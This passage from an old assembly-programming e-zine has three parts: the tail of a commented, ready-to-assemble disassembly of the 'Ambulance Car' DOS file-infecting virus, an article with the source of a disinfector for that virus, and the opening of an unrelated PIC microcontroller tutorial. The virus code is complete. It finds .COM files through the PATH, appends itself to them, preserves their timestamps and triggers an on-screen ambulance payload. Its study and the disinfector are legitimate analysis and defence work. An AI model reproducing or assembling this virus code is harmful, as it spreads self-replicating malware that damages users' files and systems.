;       out     dx, al
;       add     ax, [bx+di]
;
; Pretty basic, but could turn out to be somewhat annoying if used all over the
; place (for the person doing the disassembly, that is!)
;
; (because of 'db 01h';  used since  the near jump  above is also  3 bytes long
;  and that has to be taken into account for the displacement calculation)

real_start:
                 call    find_displacement
                 db      01h             ; Used to make this add up to 3 bytes
find_displacement:
                 pop     si
                 sub     si, offset host

; Infect twice then load up the payload

                 call    search_n_infect
                 call    search_n_infect
                 call    payload

; Restore host's original first 3 bytes

                 lea     bx, [si+original_3bytes-4]
                 mov     di, offset ambulance_car
                 mov     al, [bx]
                 mov     [di], al        ; Restore 1st byte
                 mov     ax, [bx+1]
                 mov     [di+1], ax      ; Restore 2nd and 3rd bytes

; Return control to host

                 jmp     di

; Move on to next step (be it 'search_n_infect' or 'payload')

next_step:
                 retn

ambulance_car   endp


; Search for a file and infect it
;--------------------------------
search_n_infect proc    near

; Search for the file

                 call    search

; Found any file?

                 mov     al, byte ptr [si+file_mask-4]
                 or      al, al                  ; If not,  then move  on to the
                 jz      next_step               ;  next step

; Increase 'opened files' counter

                 lea     bx, [si+counter-4]
                 inc     word ptr [bx]

; Open file in read/write mode (AL - 02h)

                 lea     dx, [si+filename-4]     ; Open a File
                 mov     ax, 3D02h               ;  [on entry AL  -  Open  mode;
                 int     21h                     ;   DS:DX - Pointer to filename
                                                 ;   (ASCIIZ string)]
                                                 ;  [returns AX - File handle]

; Save file handle

                 mov     word ptr [si+file_handle-4], ax

; Read file's first 3 bytes

                 mov     bx, word ptr [si+file_handle-4]
                 mov     cx, 3                   ; Read  from  File  or  Device,
                 lea     dx, [si+first_3bytes-4] ;  Using a Handle
                 mov     ah, 3Fh                 ;  [on entry BX -  File handle;
                 int     21h                     ;   CX  -  Number  of bytes  to
                                                 ;   read;  DS:DX  -  Address of
                                                 ;   buffer]

; Check if already infected

                 mov     al, byte ptr [si+first_3bytes-4]
                 cmp     al, 0E9h                ; Is first byte a near jump?
                 jne     infect                  ; If not,  assume  virus  isn't
                                                 ;  here, so go ahead and infect

; Move file pointer to real virus start (pointed to by the initial near jump)

                 mov     dx, word ptr [si+first_3bytes+1-4]
                 mov     bx, word ptr [si+file_handle-4]
                 add     dx, 3                   ; Add  3 bytes  to account  for
                                                 ;  the near jump
                 xor     cx, cx                  ; Move File Pointer (LSEEK)
                 mov     ax, 4200h               ;  [on entry BX -  File handle;
                 int     21h                     ;   CX:DX -  Offset,  in bytes;
                                                 ;   AL   -   Mode  code  ( Move
                                                 ;   pointer  CX:DX  bytes  from
                                                 ;   beginning of file, AL - 0)]

; Read first 6 bytes from that location

                 mov     bx, word ptr [si+file_handle-4]
                 mov     cx, 6
                 lea     dx, [si+six_bytes-4]
                 mov     ah, 3Fh                 ; Read  from  File  or  Device,
                 int     21h                     ;  Using a Handle

; Double-check if already infected
;
; Compares the bytes read  with the first part of the  displacement calculation
;  code

                 mov     ax, word ptr [si+six_bytes-4]
                 mov     bx, word ptr [si+six_bytes+2-4]
                 mov     cx, word ptr [si+six_bytes+4-4]
                 cmp     ax, word ptr [si+ambulance_car]
                 jne     infect
                 cmp     bx, word ptr [si+ambulance_car+2]
                 jne     infect
                 cmp     cx, word ptr [si+ambulance_car+4]
                 je      close_file              ; If already infected,  then go
                                                 ;  ahead and close the file

infect:

; Reset file pointer to end of file (AL - 2)

                 mov     bx, word ptr [si+file_handle-4]
                 xor     cx, cx
                 xor     dx, dx                  ; Move File Pointer (LSEEK)
                 mov     ax, 4202h               ;  [returns DX:AX - New pointer
                 int     21h                     ;   location]

; Calculate virus' near jump relative offset

                 sub     ax, 3                   ; Account for the near jump
                 mov     word ptr [si+relative_offset-4], ax

; Get and save file's date and time (AL - 0)

                 mov     bx, word ptr [si+file_handle-4]
                 mov     ax, 5700h               ; Get a File's Date and Time
                 int     21h                     ;  [on entry BX - File handle]
                 push    cx                      ;  [returns  CX  -  Time;  DX -
                 push    dx                      ;   Date]

; Write virus body to end of file

                 mov     bx, word ptr [si+file_handle-4]
                 mov     cx, virus_body - real_start
                 lea     dx, [si+ambulance_car]  ; Write to  a File  or  Device,
                 mov     ah, 40h                 ;  Using a Handle
                 int     21h                     ;  [on entry BX  - File handle;
                                                 ;   CX  -  Number  of  bytes to
                                                 ;   write;  DS:DX  - Address of
                                                 ;   buffer]

; Write host's first 3 bytes to after virus body

                 mov     bx, word ptr [si+file_handle-4]
                 mov     cx, 3
                 lea     dx, [si+first_3bytes-4]
                 mov     ah, 40h                 ; Write to  a File  or  Device,
                 int     21h                     ;  Using a Handle

; Move file pointer to beginning of file

                 mov     bx, word ptr [si+file_handle-4]
                 xor     cx, cx
                 xor     dx, dx
                 mov     ax, 4200h               ; Move File Pointer (LSEEK)
                 int     21h

; Write jump-to-virus-body code to beginning of file

                 mov     bx, word ptr [si+file_handle-4]
                 mov     cx, 3
                 lea     dx, [si+jump_code-4]
                 mov     ah, 40h                 ; Write to  a File  or  Device,
                 int     21h                     ;  Using a Handle

; Reset file's date and time to previous (AL - 1)

                 pop     dx
                 pop     cx
                 mov     bx, word ptr [si+file_handle-4]
                 mov     ax, 5701h               ; Set a File's Date and Time
                 int     21h                     ;  [on entry BX  - File handle;
                                                 ;   CX - Time; DX - Date]

close_file:
                 mov     bx, word ptr [si+file_handle-4]
                 mov     ah, 3Eh                 ; Close a File Handle
                 int     21h                     ;  [on entry BX - File handle]

                 retn

search_n_infect endp


; Find a file to infect, in the PATH or in the current directory
;---------------------------------------------------------------
search          proc    near

                 mov     ax, ds:PSP_environment_seg
                 mov     es, ax

                 push    ds
                 mov     ax, BDA_addr
                 mov     ds, ax
                 mov     bp, ds:BDA_timer_counter
                 pop     ds

; Where to infect
;
; Probability of  infecting in the  current directory  (none of  the first  two
;  lower bits of BP being set) is 1/4 (25%),  while probability of searching in
;  the PATH for a directory where to infect (one or both of the first two lower
;  bits of BP being set) is 3/4 (75%)

                 test    bp, 00000011b           ; Check if we are  to infect in
                 jz      check_cur_dir           ;  the current  directory or in
                                                 ;  a PATH directory

; Find the PATH string in the environment block
;
; Format of environment block (from Ralph Brown's Interrupt List):
;
; Offset  Size    Description
; ------  ----    -----------
; 00h     N BYTEs first environment variable, ASCIIZ string of form "var=value"
;         N BYTEs second environment variable, ASCIIZ string
;           ...
;         N BYTEs last environment variable, ASCIIZ string of form "var=value"
;           BYTE  00h
;---DOS 3.0+ ---
;           WORD  number of strings following environment (normally 1)
;         N BYTEs ASCIIZ full pathname of program owning this environment
;                 (other strings may follow)

                 xor     bx, bx                  ; Point to the first character
check_if_PATH:
                 mov     ax, es:[bx]
                 cmp     ax, 'AP'
                 jne     not_PATH
                 cmp     word ptr es:[bx+2], 'HT'
                 je      PATH_found
not_PATH:
                 inc     bx
                 or      ax, ax                  ; Check if both  AH and AL  are
                 jnz     check_if_PATH           ;  equal  to zero  (meaning the
                                                 ;  standard  environment  block
                                                 ;  is over)

; Setup to check in the current directory

check_cur_dir:
                 lea     di, [si+file_mask-4]    ; Point to file mask holder
                 jmp     short find_file

; Find a directory in the PATH

PATH_found:
                 add     bx, 5                   ; Point to after 'PATH='

find_dir:
                 lea     di, [si+pathname-4]     ; Point to PATH name holder

get_character:
                 mov     al, es:[bx]
                 inc     bx
                 or      al, al                  ; Are  we  at the  end of  this
                 jz      patch_dir               ;  PATH string?

                 cmp     al, ';'                 ; Is  this  a  PATH   directory
                 je      check_if_this_one       ;  separator?

                 mov     [di], al                ; Write this  character  to the
                 inc     di                      ;  PATH name holder
                 jmp     short get_character

check_if_this_one:
                 cmp     byte ptr es:[bx], 0     ; Are  we  at the  end of  this
                 je      patch_dir               ;  PATH string?

                 shr     bp, 1                   ; Get  rid  of  the  first  two
                 shr     bp, 1                   ;  lower  bits,   because  it's
                                                 ;  already known that  at least
                                                 ;  one them is set

; Which directory to choose
;
; Probability of  infecting in the found directory  (none of  the first  two
;  lower bits of BP being set) is 1/4 (25%),  while probability of searching in
;  the PATH for another directory where to infect (one or both of the first two
;  lower bits of BP being set) is 3/4 (75%)

                 test    bp, 00000011b           ; Check if we are to search for
                 jnz     find_dir                ;  files in this directory or
                                                 ;  not

patch_dir:
                 cmp     byte ptr [di-1], '\'    ; Does  the  directory  already
                 je      find_file               ;  have an ending '\'?

                 mov     byte ptr [di], '\'      ; If not, then add one
                 inc     di

; Find a file to infect

find_file:
                 push    ds
                 pop     es
                 mov     [si+filename_ptr-4], di ; Save current  location within
                                                 ;  the pathname/file_mask

                 mov     ax, '.*'                ; Set file mask
                 stosw
                 mov     ax, 'OC'
                 stosw
                 mov     ax, 'M'
                 stosw

                 push    es
                 mov     ah, 2Fh                 ; Get   Disk  Transfer  Address
                 int     21h                     ;  (DTA)
                                                 ;  [returns ES:BX -  Address of
                                                 ;   current DTA]

                 mov     ax, es
                 mov     word ptr [si+DTA_seg-4], ax     ; Save DTA segment
                 mov     word ptr [si+DTA_off-4], bx     ; Save DTA offset
                 pop     es

                 lea     dx, [si+new_DTA-4]      ; Setup new DTA

                 mov     ah, 1Ah                 ; Set Disk Transfer Address
                 int     21h                     ;  [on entry DS:DX - Address of
                                                 ;   DTA]

                 lea     dx, [si+file_mask-4]    ; Setup  file  mask   (with  or
                                                 ;  without a PATH directory)
                 xor     cx, cx                  ; Search for normal files only

                 mov     ah, 4Eh                 ; Find First Matching File
                 int     21h                     ;  [on   entry   CX   -    File
                                                 ;   attribute; DS:DX -  pointer
                                                 ;   to filespec (ASCIIZ string)

                 jnc     file_found              ; File found? (and no errors?)

; If no file found, then clear the file mask

                 xor     ax, ax
                 mov     word ptr [si+file_mask-4], ax
                 jmp     short restore_DTA

; Check if we are to infect this file or find another one
;
; Probability of  keeping the found  file is 1/8 (12.5%)  while probability  of
;  searching for another one is 7/8 (87.5%)

file_found:
                 push    ds
                 mov     ax, BDA_addr
                 mov     ds, ax

                 ror     bp, 1
                 xor     bp, ds:BDA_timer_counter
                 pop     ds

                 test    bp, 00000111b
                 jz      file_picked             ; Keep this file?
                                                 ; If not, then...

                 mov     ah, 4Fh                 ; Find Next Matching File
                 int     21h

                 jnc     file_found              ; File found? (and no errors?)

; Either a file was picked or no more files where found (so keep last one)

file_picked:
                 mov     di, [si+filename_ptr-4] ; Point to after path, if any
                 lea     bx, [si+f_name-4]

; Copy the file name of the found file to our filename/pathname holder

store_filename:
                 mov     al, [bx]
                 inc     bx
                 stosb
                 or      al, al                  ; Is the file name over?
                 jnz     store_filename          ; If not,  then copy  the  next
                                                 ;  character

restore_DTA:
                 mov     bx, word ptr [si+DTA_off-4]     ; Get old DTA offset
                 mov     ax, word ptr [si+DTA_seg-4]     ; Get old DTA segment
                 push    ds
                 mov     ds, ax
                 mov     ah, 1Ah                 ; Set Disk Transfer Address
                 int     21h
                 pop     ds

                 retn

search          endp


; Check if payload will be shown or not
;--------------------------------------
payload         proc    near

; Check if payload will be shown
;
; The  payload  will  be shown  only  when the  counter-of-opened-files matches
;  ...x110 (in binary)  which happens at:  6, 14, 22, 30, 38, ... 65534.  Then,
;  when the counter reaches its limit (65535) and goes back to zero, everything
;  starts again. So probability of the payload being shown is 1/8 (12.5%) and
;  of not is 7/8 (87.5%)

                 push    es
                 mov     ax, word ptr [si+counter-4]
                 and     ax, 00000111b
                 cmp     ax, 00000110b           ; Show  payload   every   eight
                 jne     exit_payload            ;  (starting  with  the  sixth)
                                                 ;  time

; Did we already show the payload? (since the computer was (re)booted)

                 mov     ax, BDA_addr
                 mov     es, ax
                 mov     ax, es:BDA_LPT3_port_addr
                 or      ax, ax                  ; If the  LPT3 port  is in use,
                 jnz     exit_payload            ;  don't show payload

; Mark LPT3 port as in use, so that the payload won't be shown again

                 inc     word ptr es:BDA_LPT3_port_addr
                 call    show_payload

exit_payload:
                 pop     es

                 retn

payload         endp


; Setup and show the 'ambulance car' payload
;-------------------------------------------
show_payload    proc    near

; Check video mode
;
; Text mode 3 (80x25) - video buffer address = 0B800h
; Text mode 7 (80x25) - video buffer address = 0B000h

                 push    ds
                 mov     di, 0B800h
                 mov     ax, BDA_addr
                 mov     ds, ax
                 mov     al, ds:BDA_video_mode
                 cmp     al, 7                   ; Check which  video mode we're
                 jne     setup_video_n_tune      ;  on,  if not  Monochrome text
                 mov     di, 0B000h              ;  mode 7, assume mode 3

setup_video_n_tune:
                 mov     es, di
                 pop     ds
                 mov     bp, 0FFF0h              ; Setup number of tones to play
                                                 ;  (will increment up to 50h)

setup_animation:
                 mov     dx, 0                   ; Setup ambulance_data column
                 mov     cx, 16                  ; Number of characters that make
                                                 ;  up one ambulance_data line

do_ambulance:
                 call    show_ambulance          ; Print the ambulance to screen
                 inc     dx
                 loop    do_ambulance

                 call    play_siren              ; Play  a tone  of the  'siren'
                 call    wait_tick               ;  and wait for a tick

                 inc     bp
                 cmp     bp, 50h                 ; Already played the 'ambulance
                 jne     setup_animation         ;  siren' tune 12 times?

                 call    speaker_off             ; If yes, then turn speaker off
                 push    ds
                 pop     es

                 retn

show_payload    endp


; Turn the PC speaker off
;------------------------
speaker_off     proc    near

; Turn off the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; (see description below)

                 in      al, 61h
                 and     al, 11111100b   ; Disable timer channel 2 and  'ungate'
                 out     61h, al         ;  its output to the speaker

                 retn

speaker_off     endp


; Turn on the speaker and play the "ambulance siren" sound
;------------------------------------------------------------
play_siren      proc    near

; Select tone frequency to generate
;
; Tone frequency is selected by means of the 3rd least significant bit of BP:
;
; Bit(s)                        Description
; ------                        -----------
; ... 3 2 1 0
; ... x 0 x x                   Play 1st tone frequency
; ... x 1 x x                   Play 2nd tone frequency
;
; If we consider A to be  the 1st tone and B to be  the 2nd tone then the whole
;  'ambulance siren' tune will be: (AAAABBBB) x 12

                 mov     dx, 07D0h       ; "ambulance siren" 1st tone frequency
                 test    bp, 00000100b   ; Check if  we are  to play
                 jz      speaker_on      ;  the first or  the second
                                         ;  tone frequency
                 mov     dx, 0BB8h       ; "ambulance siren" 2nd tone frequency

; Turn on the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; Bit(s)                        Description
; ------                        -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 1               Timer 2 gate to speaker enable
; . . . . . . 1 .               Speaker data enable
; x x x x x x . .               Other non-concerning fields

speaker_on:
                 in      al, 61h
                 test    al, 00000011b   ; If speaker is already on, then go and
                 jnz     play_tone       ;  play the sound tone
                 or      al, 00000011b   ; Else,  enable  timer  channel  2  and
                 out     61h, al         ; 'gate' its output to the speaker

; Program the PIT
;
; 8253 PIT - Programmable Interval Timer
; Port 43h, 8253 Mode Control Register
;
; Bit(s)                        Description
; ------                        -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 0               16 binary counter
; . . . . 0 1 1 .               Mode 3, square wave generator
; . . 1 1 . . . .               Read/Write LSB, followed by write of MSB
; 1 0 . . . . . .               Select counter (channel) 2

                 mov     al, 10110110b   ; Set 8253 command register
                 out     43h, al         ;  for mode 3, channel 2, etc

; Generate a tone from the speaker
;
; 8253 PIT - Programmable Interval Timer
; Port 42h, 8253 Counter 2 Cassette and Speaker Functions

play_tone:
                 mov     ax, dx
                 out     42h, al         ; Send LSB (Least Significant Byte)
                 mov     al, ah
                 out     42h, al         ; Send MSB (Most Significant Byte)

                 retn

play_siren      endp


; Show the 'ambulance car'
;-------------------------
show_ambulance  proc    near

                 push    cx
                 push    dx

                 lea     bx, [si+ambulance_data-4]
                 add     bx, dx          ; Setup  which   ambulance_data  column
                                         ; were going to print

                 add     dx, bp          ; Don't show the ambulance_data columns
                 or      dx, dx          ;  which aren't still visible
                 js      ambulance_done

                 cmp     dx, 50h         ; Check if the column we're printing is
                 jae     ambulance_done  ;  past the screen limit
                                         ; If yes,  then the don't print it

                 mov     di, 3200        ; Point to  beginning of  screen's 64th
                                         ;  line

                 add     di, dx          ; Point to the column we're supposed to
                 add     di, dx          ;  be printing at

                 sub     dx, bp          ; Restore to initial column value

                 mov     cx, 5           ; Set it up so we're in the first line

decode_character:
                 mov     ah, 7           ; Set color attribute to white

; Decode the character
;
; It's really pretty ingenius,  each character is encoded in a way, so that for
;  each line beyond the first one that  character is incremented by one and for
;  each column  beyond the  first the  same thing happens.  So taken  that into
;  account it's not difficult to  understand how it all works and how to decode
;  the ambulance_data

                 mov     al, [bx]        ; Get the character
                 sub     al, 7
                 add     al, cl          ; Account for which line we're in
                 sub     al, dl          ; Account for which column we're in

                 cmp     cx, 5           ; Are we in the first line?
                 jne     print_character ; If we are, then...

                 mov     ah, 15          ; Set color attribute to high-intensity
                                         ;  white

                 test    bp, 00000011b   ; Is this the  ending tone of a AAAA or
                                         ;  BBBB tune sequence?
                 jz      print_character ; If not,  then go ahead  and print the
                                         ;  'siren' characters

                 mov     al, ' '         ; Else,  replace  them  with a ' '  (to
                                         ;  accomplish the visual 'siren' effect

print_character:
                 stosw                   ; Print the character to screen
                 add     bx, 16          ; Point to next  ambulance_data line
                 add     di, 158         ; Point to next screen line
                 loop    decode_character

ambulance_done:
                 pop     dx
                 pop     cx

                 retn

show_ambulance  endp


; Wait for one tick (18.2 per second) to pass
;--------------------------------------------
wait_tick       proc    near

                 push    ds
                 mov     ax, BDA_addr
                 mov     ds, ax
                 mov     ax, ds:BDA_timer_counter    ; Get ticks since midnight
check_timer:
                 cmp     ax, ds:BDA_timer_counter    ; Check  if  one  tick  has
                 je      check_timer                 ;  already passed
                 pop     ds

                 retn

wait_tick       endp


;--- Data from here below

ambulance_data:
    first_line   db      22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 66h, 87h, 3Bh
                 db      2Dh, 2Eh, 2Fh, 30h, 31h
    second_line  db      23h, 0E0h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E6h, 0E7h
                 db      0E7h, 0E9h, 0EAh, 0EBh, 30h, 31h, 32h
    third_line   db      24h, 0E0h, 0E1h, 0E2h, 0E3h, 0E8h, 2Ah, 0EAh, 0E7h
                 db      0E8h, 0E9h, 2Fh, 30h, 6Dh, 32h, 33h
    fourth_line  db      25h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E7h, 0E7h, 0E8h
                 db      0E9h, 0EAh, 0EBh, 0ECh, 0EDh, 0EEh, 0EFh
    fifth_line   db      26h, 0E6h, 0E7h, 29h, 59h, 5Ah, 2Ch, 0ECh, 0EDh, 0EEh
                 db      0EFh, 0F0h, 32h, 62h, 34h, 0F4h

; Here's how the ambulance looks - see under DOS (box):
;
;        \|/
; ÜÜÜÜÜÜÜÜÛÜÜÜ
; ÛÛÛÛß ßÛÛÛ  \
; ÛÛÛÛÛÜÛÛÛÛÛÛÛÛÛ
; ßß OO ßßßßß O ß

counter         dw      9

jump_code:
near_jump       db      0E9h
relative_offset db      36h, 00h

first_3bytes    db      3      dup     (?)

file_handle     dw      ?

virus_body:

original_3bytes db      0CDh, 20h               ; 'int 20h' opcode
                 db      90h                     ; 'nop' opcode


;--- Stuff that gets saved along with the virus ends here

six_bytes       db      6       dup     (?)

filename_ptr    dw      ?

DTA_seg         dw      ?
DTA_off         dw      ?

file_mask:
filename:
pathname        db      6       dup     (?)
                 db      7       dup     (?)
                 db      67      dup     (?)

new_DTA:
    reserv       db      21      dup     (?)
    f_attr       db      ?
    f_time       dw      ?
    f_date       dw      ?
    f_size       dd      ?
    f_name       db      13      dup     (?)
    filler       db      85      dup     (?)


_TEXT           ends
                 end     ambulance_car
---------------------------------------------------------------------------8<--


Special Thanks
--------------
I would like to thank Cicatrix for sending me his collection of 'Ambulance Car'
strains, so that I would have more than two variants to study and compare.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                     'Ambulance Car' Disinfector
                                                     by Chili


Since  I  provided a  ready-to-be-assembled  virus  in  the   "'Ambulance  Car'
Disassembly"  article,  I decided to  also write a bonus  article with  a basic
disinfector for it.  Please note that this disinfector doesn't locate and clean
all existing 'Ambulance Car' strains,  though it does work on more than half of
the  strains I have  (thanks Cicatrix).  It is only  intended to work  with the
strain I provided,  so no assurances are given as to whether it will do the job
or not with other strains  (it also works with the  'RedXAny' strain look-alike
and with the tamed version that only displays the payload -  this tamed version
really isn't a virus since  it doesn't replicate and so F-PROT won't report it;
the disinfector does report and clean it though).

An infected file  can easily be cleaned by hand,  so you should try that first.
The disinfector  will scan all .COM files  in the current  directory for  three
things:  1.  the '0E9h' near jump code  (other strains may have the '0EBh' jump
code  -  this won't  detect them!);  2.  the delta  offset calculation  routine
pointed to by the near jump;  3. the ambulance data at the end of the virus (if
you change  this into something  else the disinfector will  report this file as
suspicious). Upon a suspicious or infected file report the user will be given a
chance to clean it or continue on to the next file.

And here is the disinfector:

[NOTE: F-PROT will  report this  as a new or modified  variant of SillyC  -  go
        figure!]

--8<---------------------------------------------------------------------------

; 'Ambulance Car' Disinfector
; KILLREDX by Chili for APJ #6
; Assemble with (TASM 4.1):
;       tasm /ml /m2 killredx.asm
;       tlink /t killredx.obj


LF              equ     0Ah             ; 'Line Feed' ASCII code
CR              equ     0Dh             ; 'Carriage Return' ASCII code


_TEXT           segment word public 'code'
                 assume  cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT

                 org     100h

killredx        proc    far

;--- Print program identification message

                 lea     si, killredx_msg
                 call    print_ASCIIZ

;--- Find first .COM file

                 lea     dx, com_mask
                 xor     cx, cx
                 mov     ah, 4Eh
                 int     21h
                 jnc     open_file
                 jmp     exit

open_file:

;--- Print found file's name

                 lea     si, newline_msg
                 call    print_ASCIIZ
                 mov     si, 9Eh
                 call    print_ASCIIZ

;--- Open found file

                 mov     dx, 9Eh
                 mov     ax, 3D02h
                 int     21h
                 jnc     read_jump

;--- Print open error message

                 lea     si, open_msg
                 call    print_ASCIIZ
                 jmp     find_next

read_jump:

;--- Read jump code

                 xchg    ax, bx
                 mov     cx, 3
                 lea     dx, jump_code
                 mov     ah, 3Fh
                 int     21h
                 jc      read_error
                 cmp     ax, cx
                 je      check_jump
                 jmp     close_file

check_jump:

;--- Compare with known virus' jump code

                 cmp     byte ptr [jump_code], 0E9h
                 je      read_displacement
                 jmp     close_file

read_displacement:

;--- Move file pointer to jump offset

                 mov     dx, word ptr [jump_code+1]
                 add     dx, 3
                 xor     cx, cx
                 mov     ax, 4200h
                 int     21h

;--- Read displacement calculation code

                 mov     cx, 7
                 lea     dx, displace_code
                 mov     ah, 3Fh
                 int     21h
                 jc      read_error
                 cmp     ax, cx
                 je      check_displacement
                 jmp     close_file

check_displacement:

;--- Compare with known virus' displacement calculation code

                 cmp     word ptr [displace_code], 01E8h
                 jne     exit_check
                 cmp     word ptr [displace_code+2], 0100h
                 jne     exit_check
                 cmp     word ptr [displace_code+4], 815Eh
                 jne     exit_check
                 cmp     byte ptr [displace_code+6], 0EEh
                 jne     exit_check
                 jmp     read_data
exit_check:
                 jmp     close_file

read_data:

;--- Move file pointer to supposed data location

                 mov     cx, 0FFFFh
                 mov     dx, 0FFF1h
                 mov     ax, 4202h
                 int     21h

;--- Read ambulance data

                 mov     cx, 2
                 lea     dx, ambulance_data
                 mov     ah, 3Fh
                 int     21h
                 jc      read_error
                 cmp     ax, cx
                 je      check_data
                 jmp     close_file

read_error:

;--- Print read error message

                 lea     si, read_msg
                 call    print_ASCIIZ
                 jmp     close_file

check_data:

;--- Compare with know virus' ambulance data

                 cmp     word ptr [ambulance_data], 0F434h
                 jne     suspicious

;--- Print file infected or suspicious message

                 lea     si, infected_msg
                 jmp     askto_clean
suspicious:
                 lea     si, suspicious_msg

askto_clean:

;--- Print and read answer to whether clean file or not

                 call    print_ASCIIZ
                 mov     ah, 08h
                 int     21h
                 cmp     al, 'y'
                 je      clean_file
                 cmp     al, 'Y'
                 je      clean_file
                 jmp     close_file

clean_file:

;--- Move file pointer to supposed original bytes location

                 mov     cx, 0FFFFh
                 mov     dx, 0FFFDh
                 mov     ax, 4202h
                 int     21h

;--- Read host's original (first 3) bytes

                 mov     cx, 3
                 lea     dx, original_bytes
                 mov     ah, 3Fh
                 int     21h
                 jc      read_error
                 cmp     ax, cx
                 je      write_original
                 jmp     close_file

write_original:

;--- Move file pointer to beginning of file

                 xor     cx, cx
                 xor     dx, dx
                 mov     ax, 4200h
                 int     21h

;--- Write original bytes

                 mov     cx, 3
                 lea     dx, original_bytes
                 mov     ah, 40h
                 int     21h
                 jc      write_error
                 cmp     ax, cx
                 je      truncate_file

write_error:

;--- Print write error message

                 lea     si, write_msg
                 call    print_ASCIIZ
                 jmp     close_file

truncate_file:

;--- Move file pointer to virus' jump offset (real virus start)

                 mov     dx, word ptr [jump_code+1]
                 add     dx, 3
                 xor     cx, cx
                 mov     ax, 4200h
                 int     21h

;--- Truncate file

                 mov     cx, 0
                 mov     ah, 40h
                 int     21h
                 jc      write_error
                 cmp     ax, cx
                 jne     write_error

                 lea     si, disinfected_msg
                 call    print_ASCIIZ

close_file:

;--- Close file

                 mov     ah, 3Eh
                 int     21h

find_next:

;--- Find next matching file

                 mov     ah, 4Fh
                 int     21h
                 jc      exit
                 jmp     open_file

exit:

;--- Exit to DOS

                 lea     si, newline_msg
                 call    print_ASCIIZ
                 retn

killredx        endp


print_ASCIIZ    proc    near

;--- Print an ASCIIZ string

                 lodsb
                 cmp     al, 0
                 je      end_ASCIIZ
                 xchg    al, dl
                 mov     ah, 02h
                 int     21h
                 jmp     print_ASCIIZ
end_ASCIIZ:
                 retn

print_ASCIIZ    endp


killredx_msg    db      "'Ambulance Car' Disinfector", LF, CR
                 db      "KILLREDX by Chili for APJ #6", LF, CR, 0
newline_msg     db      LF, CR, 0
infected_msg    db      "  Infected. Clean [y/n]?", 0
suspicious_msg  db      "  Suspicious. Attempt to cleanû (û WARNING: file may "
                 db      "be corrupted if infected by an unknown/unsupported "
                 db      "strain of Ambulance Car) [y/n]?", 0
disinfected_msg db      LF, CR, "  Disinfected.", 0
open_msg        db      LF, CR, "  [ERROR: opening file]", 0
read_msg        db      LF, CR, "  [ERROR: reading from file]", 0
write_msg       db      LF, CR, "  [ERROR: writing to file]", 0
com_mask        db      "*.COM", 0
jump_code       db      3       dup     (?)
displace_code   db      7       dup     (?)
ambulance_data  dw      ?
original_bytes  db      3       dup     (?)

_TEXT           ends
                 end     killredx
---------------------------------------------------------------------------8<--



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                            Assembling for PIC's
                                                            Jan Verhoeven


Below is a piece of assembly language for the MicroChip PIC processor. This
particular program will flash some LED's and activate some relays based on the
status of some control-inputs. The target MCU was the PIC 16C54, one of the
most simple chips in that range.

To give some indication of what we're upto:

   RAM                25 bytes
   ROM               512 words (of 12 bits each)
   I/O                12 bits
   Clockspeed          8 kHz (this project, max = 4 MHz)
   Instructions       33
   On-Chip-Stack       2 levels

Compare this to a modern PC clone....


RISC and Harvard architecture.
------------------------------
The PIC line of MCU's are RISC chips, so they use the Harvard architecture,
and one of the results is that they have different code- and data-memories.

Higher PIC's have more features, like INTerrupt sources on 4 or more pins,
internal interrupts etcetera. All models have a watchdogtimer (WDT) which
needs to be reset regularly (if enabled) else the MCU will reset itself.


The PIC registers.
------------------
The register architecture of the PIC is somewhat odd to Intel programmer's but
programming resembles that of the Hewlett Packard HP 11 range of calculators.

Here is an overview of the registerset. Microchip refers to this as the
"register file".

     file address          name                  comment
     ------------        --------------          --------------------
         00              indirect calls          not a real register!
         01              RTCC                    timer counter
         02              PC (or IP)              lower 8 bits of it
         03              STATUS                  flags register
         04              FSR                     bank select of PIC 16C57
         05              Port A                  has 4 I/O lines
         06              Port B                  has 8 I/O lines
         07              Port C                  8 I/O, only 16C55 and 16C57
                                                 GP register on 'C54 and 'C56
         08              GP register             General purpose register
         ..              ..                      ..
         1F              GP register             General purpose register

Besides these "transparant registers" there are also some hidden registers
(which also are write only...) for processor control. These are:

         TRISA           The "tristate A/B/C" registers determine the status
         TRISB           of each pin of the I/O ports.
         TRISC           A "1" makes it "input" and a "0" makes it an output.

         OPTION          is for controlling the WDT and the RTCC

And there's the ubiquitous "W" register. This is the "Working register" and is
used to haul data back and forth. PIC registers (or "files") cannot process
constants (or "literals"). This can only be done with the W-file. It takes
some getting used to, but the concept is simple and straightforward and
eventually you will get used to it and learn to appreciate it.

From that moment on, you will only have to get used to the fact that data is
nbot always ending up where you would like to have it. All instructions
between W and F (any register or file) end with a "d" option. If "d" is a "1",
the destination is the file F, if "d" is "0", the result will be stored in the
W file...
This took me some time to get used to and still is the main source of errors.
Apart from having selected the wrong osciallator and not disabling the WDT....


The PIC instructions.
---------------------
The instructions for the PIC 16C54 are as follows:

     mnemonic            description
     ----------------    -----------------------------------------
     ADDWF   F, d        d := W + F
     ANDLW   k           W := W AND k
     ANDWF   F, d        d := W AND F
     BCF     F, b        bit b in F is cleared   (i.e. made zero)
     BSF     F, b        bit b in F is set       (i.e. made one)
     BTFSC   F, b        if bit b in F is CLEAR, skip next instruction
     BTFSS   F, b        if bit b in F is SET, skip next instruction
     CALL    k           push PC, PC := k
     CLRF    F           Clear file F
     CLRW                Clear file W
     CLRWDT              Clear Watchdogtimer
     COMF    F           F := NOT F              (1's complement)
     DECF    F, d        d := F - 1
     DECFSZ  F, d        d := F - 1; If 0 => skip next instruction
     GOTO    k           PC = k
     INCF    F, d        d := F + 1
     INCFSZ  F, d        d := F + 1; If 0 => skip next instruction
     IORLW   k           W := W OR k
     IORWF   F, d        d := W OR F
     MOVF    F, d        d := F          (zero flag affected)
     MOVLW   k           W := k
     MOVWF   F           F := W
     NOP                 No operation
     OPTION              OPTION := W
     RETLW   k           W := k, pop PC
